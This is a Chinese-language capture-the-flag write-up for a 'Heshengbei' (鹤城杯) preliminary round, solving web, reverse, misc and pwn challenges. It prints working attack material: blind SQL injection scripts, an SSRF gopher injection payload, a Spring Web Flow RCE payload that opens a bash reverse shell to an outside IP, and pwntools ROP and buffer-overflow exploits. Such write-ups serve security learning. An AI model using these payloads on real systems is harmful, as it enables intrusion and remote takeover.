首届"鹤城杯"CTF网络安全挑战赛 - 初赛writeup

水深无声 2024-04-07 10:43 61阅读 0赞

WEB

#### **1.middle\_magic** ####

%0a绕过第一关最后加%23是\#

数组绕过第二关

json 弱类型比较

http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23

POST：
    admin[]=1&root_pwd[]=2&level_3={
               "result":0}

flag{f03d41bf6c8d55f12324fd57f7a00427}

#### 2.easy\_sql\_2 ####

登录功能，post传username和password。尝试admin,admin弱口令登录成功但是提示flag并不在这里。

username尝试-1'||'1'%23发现是password error!，因此猜测后端的应该是根据传入的username查出对应的password，查到了就不再是username error!，然后讲传入的password进行一次md5后与这个password比较，相同就登录成功。

尝试SQL注入，但是ban了select，因此利用table注入。

数据库名的话很好注入，直接不用table用regexp也可以注出是ctf了，然后开始注表名。

虽然过滤了tables，但是columns没有过滤，可以利用informaion\_schema.columns来盲注出表名：

mysql8.0，table statement：

过滤了information\_schema.table用mysql.innodb\_table\_stats

admin'/**/and/**/(('ctf','%s',3,4,5,6)<=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#

注出来flag表fl11aag

16进制注一下：

import string

import requests

import time

req = requests.session()

url = "http://182.116.62.85:26571/login.php"

def hh():

payload = "admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#"

chars = string.printable.replace(".","").replace("?","").replace("`","").replace("+","") + "_\{}"

result = ""

for i in range(1,100):

for j in range(48,125):

data = {'username':payload%(i,j),'password':"admin"}

rep =  req.post(url,data)

text = rep.text

if "success" in text:

print(j)

result += chr(j)

# print((chr(j)),end="")

# payload = payload%(chr(j-1)+'%s')

print(result)

break

hh()

或者 \# -\*-coding:utf-8-\*- import requestsdef bind\_sql(): flag = "" dic = "~\}|\{zyxwvutsrqponmlkjihgfedcba\`\_^\]\\\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+\*)(&%$\#!" for i in range(1,1000): f = flag for j in dic: \_ = flag + j \# payload = "11'||('ctf',binary'\{\}',1,2,3,4)<(table/\*\*/mysql.innodb\_table\_stats/\*\*/limit/\*\*/1,1)\#".format(\_) \#admin,fl11aag payload = "11'||(binary'\{\}')<(table/\*\*/ctf.fl11aag/\*\*/limit/\*\*/1,1)\#".format(\_) print(payload) data = \{ "username": payload, "password": "admin" \} res = requests.post(url=url, data=data) if 'success' in res.text: if j == '~': flag = flag\[:-1\] + chr(ord(flag\[-1\])+1) print(flag) exit() flag += j print(flag) break if flag == f: break return flagif \_\_name\_\_ == '\_\_main\_\_': url = 'http://182.116.62.85:26571/login.php' result = bind\_sql() print(result)

#### 3. easy\_sql\_1 ####

gopher打index，试了下admin/admin发现给了个cookie，解码后是admin，测试单引号有报错，报错注入，在cookie注入

admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#

Exp：

gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D%0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A

老登录界面，说不是inner所以不行，f12看到use.php，进去有个ssrf，利用gopher协议打post然后adminadmin登录后发现给了cookie:this\_is\_your\_cookie=YWRtaW4=，把cookie带上

再经过一些尝试发现post没什么回显，尝试cookie是不是可以注入，将admin'base64加密后填上去再访问，直接SQL语句报错，用的sqli-labs的库，直接报错注出flag即可：

import requests

from urllib.parse import quote

data="""POST / HTTP/1.1

Host: 127.0.0.1:80

Content-Type: application/x-www-form-urlencoded

Cookie: this\_is\_your\_cookie=LTEnKXx8dXBkYXRleG1sKDEsY29uY2F0KDEsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZykgZnJvbSBmbGFnKSwxKSwxKSM=;PHPSESSID=susn9dj4f1806v0pl5oiureek1;

Content-Length: \{\}

\{\}

"""

payload="uname=admin&passwd=admin"

length=len(payload)

data=data.format(length,payload)

data=quote(data,'utf-8')

url="http://182.116.62.85:28303/use.php"

params=\{

'url':"gopher://127.0.0.1:80/\_"+data

headers=\{

'Cookie':"PHPSESSID=8t4ppbs8ek3l5v5estgbttqtu3"

r=requests.get(url,params=params,headers=headers)

print(r.text)

#### 4. spring ####

题目为CVE-2017-4971-Spring Web Flow远程代码执行漏洞

xman原题：

[https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/][https_www.xctf.org.cn_library_details_8ad0f5b6ac740ec0930e948a40f34a67b3d4f565]

进入登录页面以后随便填一个给出的账号登录

![7fd82fe56cb6916490958ef754c56f52.jpeg][]

然后进入http://ip/hotels/1页面点击Book Hotel

![c6499659d42fc615fa1180ea5626d529.jpeg][]

然后随便填写信息后点击Proceed按钮跳转到确认页面

![87150a2ba6679eaee7dc96b0eecbcb2e.jpeg][]

点击Confirm抓包，输入payload后服务器开启监听

![5a7122215098c5b35c6fbc9a5e68f934.jpeg][]

\_eventId\_confirm=&\_csrf=bcc5ce94-5277-4064-b5f7-850432e3d2f0&\_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/121.40.134.251/10086+0>%261")).start()=vulhub

![9ef769099a8c11786098a4efca9cb288.jpeg][]

然后发送数据包等待服务器连接

![3a1384a7c63edb174925025e1b68ff67.jpeg][]

成功getshell，在根目录发现flag.txt文件，查看得到flag

flag:XMAN\{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y\}

#### 5.easypy ####

<?php

include 'utils.php';

if (isset($_POST['guess'])) {

$guess = (string) $_POST['guess'];

if ($guess === $secret) {

$message = 'Congratulations! The flag is: ' . $flag;

} else {

$message = 'Wrong. Try Again';

}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {

exit("hacker :)");

}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){

exit("hacker :)");

}

if (isset($_GET['show_source'])) {

highlight_file(basename($_SERVER['PHP_SELF']));

exit();

}else{

show_source(__FILE__);

}

原题魔改，参考连接：https://www.gem-love.com/ctf/1898.html 直接打：http://182.116.62.85:21895/index.php/utils.php/%81?show[source

或者

/index.php/utils.php/%ff/?show[source

### Reverse ###

#### 1.DesignEachStep ####

![87e4870c492afc35098edca5bf8668a1.jpeg][]

Figure 1: 主要是用了Arrays.equals与输入进行校验，直接frida hook：function main()\{ Java.perform(function()\{ var ByteString = Java.use("com.android.okhttp.okio.ByteString"); Java.use("java.util.Arrays").equals.overload('\[B', '\[B').implementation = function(x, y)\{ console.log("start......"); var result = this.equals(x, y); console.log("arg:", ByteString.of(x).utf8(), ByteString.of(y).utf8()); return result; \} \}) \} setImmediate(main)

![53c5bc71b8aeb81da1cde59db2c84564.jpeg][]

Figure 2: 得到flag： flag\{DE5\_c0mpr355\_m@y\_c0nfu53\}

#### **2.AreYouRich** ####

根据最后的balance要大于4999999，这里又是一个rc4加密，解密得到账号密码。

![45c96c366f9f371962e60e0a5d42f6eb.jpeg][]

Figure 3:

![525010afbe3ba8da31b5c4dbb1a146c1.jpeg][]

Figure 4: 登录，购买flag

![d34d1c0cd0690ed5c05df60cc9cb766e.jpeg][]

flag：flag\{y0u\_h@V3\_@\_107\_0f\_m0n3y!!\}

#### **3.petition** ####

一直异或，中间有一个～，0的反就是0xff。 s = \[0x1e, 0, 7, 0xce, 0xf9, 0x8c, 0x88, 0xa8, 0x52, 0x99, 0x19, 0x15, 0x66, 0x2e, 0xaf, 0xf6, 0x43, 0x2c, 0xc9, 0xca, 0x66, 0xaa, 0x4c, 0, 0x25, 0xd6, 0xff, 0x44, 0xbd, 0x72, 0x65, 8, 0x85, 0x12, 0x7f, 0x13, 0x24, 0xfc, 0x24, 0x33, 0x23, 0x97, 0xb2\] s1 = \[0x78, 108, 0x66, 0xa9, 0x82, 0xb5, 0xbe, 0xcb, 0x64, 0xa0, 0x2f, 0x21, 0x50, 3, 0x97, 0xc7, 0x7b, 0x18, 0xe4, 0xfe, 0x55, 0x9c, 0x7f, 0x2d, 0x1d, 0xb2, 0x9a, 0x7d, 0x90, 0x45, 0x56, 0x6e, 0xb2, 0x21, 0x46, 0x2b, 0x14, 0xca, 0x12, 0x50, 0x12, 0xea, 0xb2\]print(len(s))flag = "" for i in range(len(s)): flag += chr(s\[i\] ^ s1\[i\]) print(flag)或者 总的来说还是比较喜欢这类题目的，因为它的flag是一位一位校验的，能爆破当然是一件很爽的事情。 回到正文：IDA载入文件：

![6fa22a135343b49601de08960541bf63.jpeg][]

程序从start开始执行，说是说＂%36s＂，实际上要输入整整42位，骗子。 往下的start后面的一堆函数，去翻看的话会发现每个都长得差不多，然后就猜测flag会不会是逐位校验，一位flag对应一个函数。 调试什么的还是比较累的(我不会告诉你其实我根本看不懂flag是怎么校验的)，为了偷懒，这里是直接使用了Unicorn，将start函数里面调用printf、scanf 的地方给patch掉，再对scanf 做一个hook以保证flag能输入到内存。这样就能把程序的输入和校验功能给运行起来了，下面是我对这个程序写的Unidbg类： from unicorn import \* from unicorn.x86\_const import \* from capstone import \* import binasciiPetition\_base = 0x0 \# 程序加载的地址 Petition\_stack\_base = 0x10000 with open("Petition", "rb") as f: code = f.read() xxx = \[b'\\x00', b'\\x01', b'\\x02', b'\\x03', b'\\x04', b'\\x05', b'\\x06', b'\\x07', b'\\x08', b'\\x09', b'\\x0a', b'\\x0b', b'\\x0c', b'\\x0d', b'\\x0e', b'\\x0f', b'\\x10', b'\\x11', b'\\x12', b'\\x13', b'\\x14', b'\\x15', b'\\x16', b'\\x17', b'\\x18', b'\\x19', b'\\x1a', b'\\x1b', b'\\x1c', b'\\x1d', b'\\x1e', b'\\x1f', b'\\x20', b'\\x21', b'\\x22', b'\\x23', b'\\x24', b'\\x25', b'\\x26', b'\\x27', b'\\x28', b'\\x29', b'\\x2a', b'\\x2b', b'\\x2c', b'\\x2d', b'\\x2e', b'\\x2f', b'\\x30', b'\\x31', b'\\x32', b'\\x33', b'\\x34', b'\\x35', b'\\x36', b'\\x37', b'\\x38', b'\\x39', b'\\x3a', b'\\x3b', b'\\x3c', b'\\x3d', b'\\x3e', b'\\x3f', b'\\x40', b'\\x41', b'\\x42', b'\\x43', b'\\x44', b'\\x45', b'\\x46', b'\\x47', b'\\x48', b'\\x49', b'\\x4a', b'\\x4b', b'\\x4c', b'\\x4d', b'\\x4e', b'\\x4f', b'\\x50', b'\\x51', b'\\x52', b'\\x53', b'\\x54', b'\\x55', b'\\x56', b'\\x57', b'\\x58', b'\\x59', b'\\x5a', b'\\x5b', b'\\x5c', b'\\x5d', b'\\x5e', b'\\x5f', b'\\x60', b'\\x61', b'\\x62', b'\\x63', b'\\x64', b'\\x65', b'\\x66', b'\\x67', b'\\x68', b'\\x69', b'\\x6a', b'\\x6b', b'\\x6c', b'\\x6d', b'\\x6e', b'\\x6f', b'\\x70', b'\\x71', b'\\x72', b'\\x73', b'\\x74', b'\\x75', b'\\x76', b'\\x77', b'\\x78', b'\\x79', b'\\x7a', b'\\x7b', b'\\x7c', b'\\x7d'\]class Unidbg:def \_\_init\_\_(self, flag, except\_hit): self.except\_hit = except\_hit self.hit = 0 self.flag = flag self.fff = 0 mu = Uc(UC\_ARCH\_X86, UC\_MODE\_32) \# 程序基址为 0x1000，分配 128 KB内存 mu.mem\_map(Petition\_base, 0x10000 \* 2) mu.mem\_write(Petition\_base, code)\# 设置寄存器的值 mu.reg\_write(UC\_X86\_REG\_EAX, 0) mu.reg\_write(UC\_X86\_REG\_EBX, 0) mu.reg\_write(UC\_X86\_REG\_ECX, 0) mu.reg\_write(UC\_X86\_REG\_EDX, 0) mu.reg\_write(UC\_X86\_REG\_ESI, 0) mu.reg\_write(UC\_X86\_REG\_EDI, 0) mu.reg\_write(UC\_X86\_REG\_EBP, 0) mu.reg\_write(UC\_X86\_REG\_ESP, Petition\_stack\_base) mu.reg\_write(UC\_X86\_REG\_EIP, 0x1040) \# patch printf() mu.mem\_write(0x10C6, b'\\x90\\x90\\x90\\x90\\x90') \# patch scanf()mu.mem\_write(0x110B, b'\\x90\\x90\\x90\\x90\\x90') mu.hook\_add(UC\_HOOK\_CODE, self.hook\_function\_scanf, begin=0x110A, end=0x110C) mu.hook\_add(UC\_HOOK\_CODE, self.hook\_code, begin=0x119C, end=0x28A0) if self.except\_hit < 127: mu.hook\_add(UC\_HOOK\_CODE, self.trace) self.mu = mu self.md = Cs(CS\_ARCH\_X86, CS\_MODE\_32)def solve(self): try: self.mu.emu\_start(0x1040, 0x29C4) except: pass return self.hitdef trace(self, mu, address, size, data): disasm = self.md.disasm(mu.mem\_read(address, size), address) for i in disasm: print(i)def hook\_function\_scanf(self, mu, address, size, data): if address == 0x110C: \# self.show\_reg() edx = mu.reg\_read(UC\_X86\_REG\_EDI) mu.mem\_write(edx, self.flag) \# print(self.flag, binascii.b2a\_hex(mu.mem\_read(edx, 36)).decode(), hex(edx)) passdef show\_reg(self ): print("EAX", hex(self.mu.reg\_read(UC\_X86\_REG\_EAX))\[2:\].upper().zfill(8)) print("EBX", hex(self.mu.reg\_read(UC\_X86\_REG\_EBX))\[2:\].upper().zfill(8)) print("ECX", hex(self.mu.reg\_read(UC\_X86\_REG\_ECX))\[2:\].upper().zfill(8)) print("EDX", hex(self.mu.reg\_read(UC\_X86\_REG\_EDX))\[2:\].upper().zfill(8)) print("ESP", hex(self.mu.reg\_read(UC\_X86\_REG\_ESP))\[2:\].upper().zfill(8)) print("EBP", hex(self.mu.reg\_read(UC\_X86\_REG\_EBP))\[2:\].upper().zfill(8)) print("ESI", hex(self.mu.reg\_read(UC\_X86\_REG\_ESI))\[2:\].upper().zfill(8)) print("EDI", hex(self.mu.reg\_read(UC\_X86\_REG\_EDI))\[2:\].upper().zfill(8)) print("EIP", hex(self.mu.reg\_read(UC\_X86\_REG\_EIP))\[2:\].upper().zfill(8))def hook\_code(self, mu, address, size, data): Temp = False if address == 0x119E: \# 取每个函数中第二条指令的首地址 Temp = True if address == 0x122C: Temp = True if address == 0x12BA: Temp = True if address == 0x1346: Temp = True if address == 0x13D2: Temp = True if address == 0x145E: Temp = True if address == 0x14EA: Temp = True if address == 0x1576: Temp = True if address == 0x1604: Temp = True if address == 0x1690: Temp = True if address == 0x171E: Temp = True if address == 0x17A8: Temp = True if address == 0x1836: Temp = True if address == 0x18C4: Temp = True if address == 0x1950: Temp = True if address == 0x19DC: Temp = True if address == 0x1A66: Temp = True if address == 0x1AF0: Temp = True if address == 0x1B7C: Temp = True if address == 0x1C08: Temp = True if address == 0x1C96: Temp = True if address == 0x1D22: Temp = True if address == 0x1DAC: Temp = True if address == 0x1E36: Temp = True if address == 0x1EC4: Temp = True if address == 0x1F50: Temp = True if address == 0x1FDC: Temp = True if address == 0x2066: Temp = True if address == 0x20F2: Temp = True if address == 0x217C: Temp = True if address == 0x220A: Temp = True if address == 0x2294: Temp = True if address == 0x2320: Temp = True if address == 0x23AE: Temp = True if address == 0x243C: Temp = True if address == 0x24C6: Temp = True if address == 0x2554: Temp = True if address == 0x25E0: Temp = True if address == 0x266E: Temp = True if address == 0x26FC: Temp = True if address == 0x2786: Temp = True if address == 0x2812: Temp = True if address == 0x289E: Temp = Trueif Temp: print(hex(address)) self.hit += 1 先随便输入几个flag，验证一下之前的猜想：

![191f65d860bdef89a2836c0b5ec15cec.jpeg][]

好吧，到这里已经可以确认，我之前的猜想是成立的，这就很nice。 下面就是爆破了： flag = b''for j in range(42): for i in b'0123456789abcdef\{\}-\_\#!?ghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ': tem = bytearray(flag + b'x' \* (42 - len(flag))) tem\[j\] = i if Unidbg(bytes(tem), 127).solve() == j +1: flag += xxx\[i\] print(flag.decode())效果示意：

![f8a55fd906dee5a759571ed353d6bb63.jpeg][]

或者

import os
    
    #flag = "flag{96c69646-8184-4363-8de9-73f7398066c1}"
    addr_l = [0x5655619c, 0x5655622a, 0x565562b8, 0x56556344, 0x565563d0, 0x5655645c, 0x565564e8, 0x56556574, 0x56556602, 0x5655668e, 0x5655671c, 0x565567a6,\
            0x56556834, 0x565568c2, 0x5655694e, 0x565569da, 0x56556a64, 0x56556aee, 0x56556b7a, 0x56556c06, 0x56556c94, 0x56556d20, 0x56556daa, 0x56556e34,\
            0x56556ec2, 0x56556f4e, 0x56556fda, 0x56557064, 0x565570f0, 0x5655717a, 0x56557208, 0x56557292, 0x5655731e, 0x565573ac, 0x5655743a, 0x565574c4,\
            0x56557552, 0x565575de, 0x5655766c, 0x565576fa, 0x56557784, 0x56557810, 0x5655789c]
    
    flag = ""
    for addr in addr_l:
        with open('script', 'w') as f:
            temp = """break *{0} if $pc == {1}
    commands
    silent
    printf "blogg9ggg"
    continue
    end
    
    run""".format(hex(addr), hex(addr))
            f.write(temp)
            f.close()
    
        i = 32
        while(i <= 127):
            tflag = flag + chr(i)
    
            with open('in', 'w') as f:
                f.write(tflag)
                f.close()
    
            os.system("gdb ./Petition -batch -x script > log < in")
    
            ok = False
            with open("log") as f:
                temp = f.read()
                if(temp.find("blogg9ggg") != -1):
                    ok = True
                f.close()
            
            if(ok == True):
                flag += chr(i)
                break
            i += 1
        
        print(flag)

FLAG　：　flag\{96c69646-8184-4363-8de9-73f7398066c1\}

## MISC ##

#### 1.流量分析 ####

原题，先用tshark 把请求提取出来

tshark -r timu.pcapng -T fields -e http.request.full_uri|tr -s '\n'|grep flag > log

用脚本跑下注入后面的ascii码即可

import re
        
        
         
        
        
         
          
         
         with open('log') as f:
        
        
         
        
        
         
          
         
             tmp = f.read()
        
        
         
        
        
         
          
         
             flag = ''
        
        
         
        
        
         
          
         
             data = re.findall(r'=(\d*)--',tmp)
        
        
         
        
        
         
          
         
             data = [int(i) for i in data]
        
        
         
        
        
         
          
         
             for i,num in enumerate(data):
        
        
         
        
        
         
          
         
                 try:
        
        
         
        
        
         
          
         
                     if num > data[i+1]:
        
        
         
        
        
         
          
         
                         flag += chr(num)
        
        
         
        
        
         
          
         
                 except Exception:
        
        
         
        
        
         
          
         
                     pass
        
        
         
        
        
         
          
         
             print(flag)
        
        
         
        
        
         
          
         
         #flag{w1reshARK_ez_1sntit}
        
        
         
        
        
         
          
         
         或者
        
        
         
        
        
         
         
         
          下载附件以后得到一个数据包，用Wireshark分析流量发现sql注入数据，筛选出http数据仔细查看是布尔盲注 
         
         
          
          
          
           
         
         
          
         
         
          记录下每次最大ASCII码数据包然后ASCII码转字符得到flag

#### **2.a\_misc** ####

附件下载下来发现压缩包需要密码，看了下不是伪加密，爆破得出密码qwer

![96d21012f18b266264ff1dfd779d32a2.jpeg][]

打开压缩包以后发现一个图片，发现图片内容是一个云盘链接，打开链接发现需要提取码，修改图片高度以后发现提取码

![5479057e065d1a3c045f3db88ac2dfc6.jpeg][]

云盘内容还是一个数据包，Wireshark打开后发现依然是sql注入流量，只不过换成了时间盲注，方法与前面流量分析一样，提取出注入成功的ASCII码后转换为字符串得到flag

过滤下POST包发现在盲注，和第一题一样提取下ascii即可

result = [102, 108, 97, 103, 123, 99, 100, 50, 99, 51, 101, 50, 102, 101, 97, 52, 54, 51, 100, 101, 100, 57, 97, 102, 56, 48, 48, 100, 55, 49, 53, 53, 98, 101, 55, 97, 113, 125]
        
        
         
        
        
         
          
         
         flag = ""
        
        
         
        
        
         
          
         
         for i in result:
        
        
         
        
        
         
          
         
             flag +=chr(i)
        
        
         
        
        
         
          
         
         print(flag)
        
        
         
        
        
         
          
         
         #flag{cd2c3e2fea463ded9af800d7155be7aq}

#### **3.Misc2** ####

下载附件只有一个check.pnd的图片，修改高度后依然没有结果，查看文件属性发现位深度是32位，想到LSB隐写，用Stegsolve查看alpha通道为0时图片是空白，所以判断alpha通道不存在数据

![ee46043dc42cc5222aaa2c37c7a7a7b9.jpeg][]

查看红蓝绿最低为信息发现16进制编码

发现存在16进制

?   flag{h0w_4bouT_enc0de_4nd_pnG}m?

这里直接转10进制再转下ascii即可

![988660a199d9ac70a4d15bc17ec1d2a4.jpeg][]

flag{h0w_4bouT_enc0de_4nd_pnG}

#### **4.m1** ####

原题： https://www.glun.top/2020/10/05/ctf02/ ，连 flag 都没改

flag{5cae25efeb73d7ba22f7728427376f59}

#### 5. new\_misc ####

下载文件，是一个pdf文件

![c7a4f167df78d706bbae370b19b8598c.jpeg][]

打开pdf，有俄文看不懂，因为是一道杂项题考虑隐写，百度“ctf pdf 隐写” http://blog.sina.com.cn/s/blog\_6dc0c58b0102x9zd.html 找到了这位师傅写的总结，pdf两种隐写方式，如下图：

![713e65ab94316c2120502cc4485df826.jpeg][]

找工具：wbStego4.3open 找不到工具的师傅可以去我分享的链接下载：链接：https://pan.baidu.com/s/1S-w-W8YcAZVU4hKJXez7cg 提取码：da4l 打开软件 点击continue 选择 decode 点continue 选择文件timu.pdf

![f5d2e8974024707a9a532e9ebe4b9447.png][]

之后再点continue(空密码，弱密码破解) 输入 输出的文件名字 得到txt文件

![17ae19215284d4c48943106aef497186.jpeg][]

flag\{verY\_g00d\_YoU\_f0und\_th1s\}

## **PWN** ##

#### **1.echo** ####

\#coding:utf-8

import sys

from pwn import \*

from ctypes import CDLL

context.log\_level='debug'

elfelf='./easyecho'

\#context.arch='amd64'

while True :

\# try :

elf=ELF(elfelf)

context.arch=elf.arch

gdb\_text='''

telescope $rebase(0x202040) 16

'''

if len(sys.argv)==1 :

clibc=CDLL('/lib/x86\_64-linux-gnu/libc-2.23.so')

io=process(elfelf)

\# io=process(\['./'\],env=\{'LD\_PRELOAD':'./'\})

clibc.srand(clibc.time(0))

libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')

\# ld = ELF('/lib/x86\_64-linux-gnu/ld-2.23.so')

one\_gadgaet=\[0x45226,0x4527a,0xf03a4,0xf1247\]

else :

clibc=CDLL('/lib/x86\_64-linux-gnu/libc-2.23.so')

io=remote('182.116.62.85',24842)

clibc.srand(clibc.time(0))

\# libc=ELF('./libc.so.6')

\# ld = ELF('/lib/x86\_64-linux-gnu/ld-2.23.so')

one\_gadgaet=\[0x45226,0x4527a,0xf03a4,0xf1247\]

pay='a'\*0x10

io.recv()

io.send(pay)

io.recvuntil('a'\*0x10)

elf\_base=u64(io.recv(6)+'\\x00\\x00')-0xcf0+0x202040

io.sendline('backdoor')

io.recv()

\# gdb.attach(io,gdb\_text)

io.sendline('a'\*0x168+p64(elf\_base))

io.recv()

io.sendline('exitexit')

\# io.sendline(pay)

\# success('libc\_base:'+hex(libc\_base))

\# success('heap\_base:'+hex(heap\_base))

\# gdb.attach(io,gdb\_text)

io.interactive()

\# except Exception as e:

\# io.close()

\# continue

\# else:

\# continue

#### **2.supermarket** ####

原题 网上找的脚本

\#coding:utf-8

from pwn import \*

\# context.log\_level = 'debug'

debug = 0

if debug == 1:

r = process('./task\_supermarket')

\# gdb.attach(r)

else:

r = remote('182.116.62.85',27518)

def add(name, price, descrip\_size, description):

r.recvuntil('your choice>> ')

r.send('1\\n')

r.recvuntil('name:')

r.send(name + '\\n')

r.recvuntil('price:')

r.send(str(price) + '\\n')

r.recvuntil('descrip\_size:')

r.send(str(descrip\_size) + '\\n')

r.recvuntil('description:')

r.send(str(description) + '\\n')

def dele(name):

r.recvuntil('your choice>> ')

r.send('2\\n')

r.recvuntil('name:')

r.send(name + '\\n')

def lis():

r.recvuntil('your choice>> ')

r.send('3\\n')

r.recvuntil('all commodities info list below:\\n')

return r.recvuntil('\\n---------menu---------')\[:-len('\\n---------menu---------')\]

def changePrice(name, price):

r.recvuntil('your choice>> ')

r.send('4\\n')

r.recvuntil('name:')

r.send(name + '\\n')

r.recvuntil('input the value you want to cut or rise in:')

r.send(str(price) + '\\n')

def changeDes(name, descrip\_size, description):

r.recvuntil('your choice>> ')

r.send('5\\n')

r.recvuntil('name:')

r.send(name + '\\n')

r.recvuntil('descrip\_size:')

r.send(str(descrip\_size) + '\\n')

r.recvuntil('description:')

r.send(description + '\\n')

def exit():

r.recvuntil('your choice>> ')

r.send('6\\n')

add('1', 10, 8, 'a')

add('2', 10, 0x98, 'a')

add('3', 10, 4, 'a')

changeDes('2', 0x100, 'a')

add('4', 10, 4, 'a')

def leak\_one(address):

changeDes('2', 0x98, '4' + '\\x00' \* 0xf + p32(2) + p32(0x8) + p32(address))

res = lis().split('des.')\[-1\]

if(res == '\\n'):

return '\\x00'

return res\[0\]

def leak(address):

content = leak\_one(address) + leak\_one(address + 1) + leak\_one(address + 2) + leak\_one(address + 3)

log.info('%\#x => %\#x'%(address, u32(content)))

return content

d = DynELF(leak, elf = ELF('./task\_supermarket'))

system\_addr = d.lookup('system', 'libc')

log.info('system \\'s address = %\#x'%(system\_addr))

bin\_addr = 0x0804B0B8

changeDes('1', 0x8, '/bin/sh\\x00')

changeDes('2', 0x98, '4' + '\\x00' \* 0xf + p32(2) + p32(0x8) + p32(0x0804B018))

changeDes('4', 8, p32(system\_addr))

dele('1')

r.sendline('cat flag')

r.interactive()

#### 3.task\_babyof ####

from pwn import \*

from pwn import p64, u64, p32, u32, p8

context.arch = 'amd64'

context.log\_level = 'debug'

context.terminal = \['tmux', 'sp', '-h'\]

elf = ELF('./babyof')

\# libc = ELF('/lib/x86\_64-linux-gnu/libc-2.27.so')

libc = ELF('./libc-2.27.so')

\# io = process('./babyof')

io = remote('182.116.62.85','21613')

prdi = 0x0000000000400743 \# : pop rdi

prsi = 0x0000000000400741 \# : pop rsi ; pop r15 ; ret

def exp():

io.recvuntil('Do you know how to do buffer overflow?')

payload = b'a'\*0x48 + \\

p64(prdi) + p64(elf.got\['puts'\]) + p64(elf.plt\['puts'\]) + p64(0x40066B)

io.send(payload)

leak = u64(io.recvuntil(b'\\x7f')\[-6:\].ljust(8, b'\\x00'))

info(hex(leak))

libc\_base = leak - libc.sym\['puts'\]

system = libc\_base + libc.sym\['system'\]

info(hex(system))

binsh = libc\_base + next(libc.search(b'/bin/sh\\x00'))

io.recvuntil('Do you know how to do buffer overflow?')

payload = b'a'\*0x48 + p64(prdi) + p64(binsh)+p64(0x0000000000130569+libc\_base)+p64(0)\*2+p64(system) \# + p64(0x40066b)

\# gdb.attach(io)

io.send(payload)

exp()

io.interactive()

或者

\# -\*- coding: utf-8 -\*-

from pwn import \*

\#p=process('./1')

p=remote('182.116.62.85',21613)

elf=ELF('1')

\#p=process(\['./1'\],env=\{'LD\_PRELOAD':'./libc-2.27\_64.so'\})

libc=ELF('libc-2.27.so')

\#libc=ELF('/lib/x86\_64-linux-gnu/libc.so.6')

\#p=remote('node4.buuoj.cn',26442)

\#libc=ELF('/ctf/work/buuoj/buu\_libc/libc-2.27\_64.so')

context(arch='amd64', os='linux', terminal=\['tmux', 'splitw', '-h'\])

context.log\_level='debug'

def debug():

gdb.attach(p)

pause()

def lg(name,val):

log.success(name+' : '+hex(val))

def add():

p.recvuntil('Give me your choice : ')

p.sendline('1')

ret=0x0000000000400506

pop\_rdi=0x0000000000400743

p.recvuntil('Do you know how to do buffer overflow?')

payload=0x40\*'a'+p64(0)+p64(ret)+p64(pop\_rdi)+p64(elf.got\['read'\])+p64(elf.plt\['puts'\])

payload+=p64(0x400632 )

p.send(payload)

libc.address=u64(p.recvuntil('\\x7f')\[-6:\].ljust(8,'\\x00'))-libc.sym\['read'\]

print hex(libc.address)

payload=0x40\*'a'+p64(0)+p64(ret)+p64(pop\_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym\['system'\])

p.send(payload)

p.recvuntil('Do you know how to do buffer overflow?')

p.send(payload)

p.interactive()

#### 4.task\_littleof ####

#coding:utf-8

import sys

from pwn import *

from ctypes import CDLL

context.log_level='debug'

elfelf='littleof'

#context.arch='amd64'

while True :

# try :

elf=ELF(elfelf)

context.arch=elf.arch

gdb_text='''

telescope $rebase(0x202040) 16

'''

if len(sys.argv)==1 :

clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')

io=process(elfelf)

# io=process(['./'],env={'LD_PRELOAD':'./'})

clibc.srand(clibc.time(0))

libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')

one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

else :

clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')

io=remote('182.116.62.85',27056)

clibc.srand(clibc.time(0))

libc=ELF('./libc-2.27.so')

# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')

one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

pay='a'*0x49

io.recv()

io.send(pay)

io.recvuntil('a'*0x49)

canary='\x00'+io.recv(7)

pay='a'*0x48+canary+p64(0)+p64(0x400863)

pay+=p64(elf.got['puts'])+p64(elf.plt['puts'])

pay+=p64(0x400789)

io.recv()

io.send(pay)

libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']

libc.address=libc_base

bin_sh_addr=libc.search('/bin/sh\x00').next()

system_addr=libc.sym['system']

free_hook_addr=libc.sym['__free_hook']

pay='a'*0x48+canary+p64(0)+p64(0x400863)

pay+=p64(bin_sh_addr)

pay+=p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system_addr)

pay+=p64(0x400600)

io.recv()

io.sendline('a')

io.recvuntil('Try harder!')

# gdb.attach(io,gdb_text)

io.sendline(pay)

success('libc_base:'+hex(libc_base))

# success('heap_base:'+hex(heap_base))

# gdb.attach(io,gdb_text)

io.interactive()

# except Exception as e:

#     io.close()

#     continue

# else:

#     continue

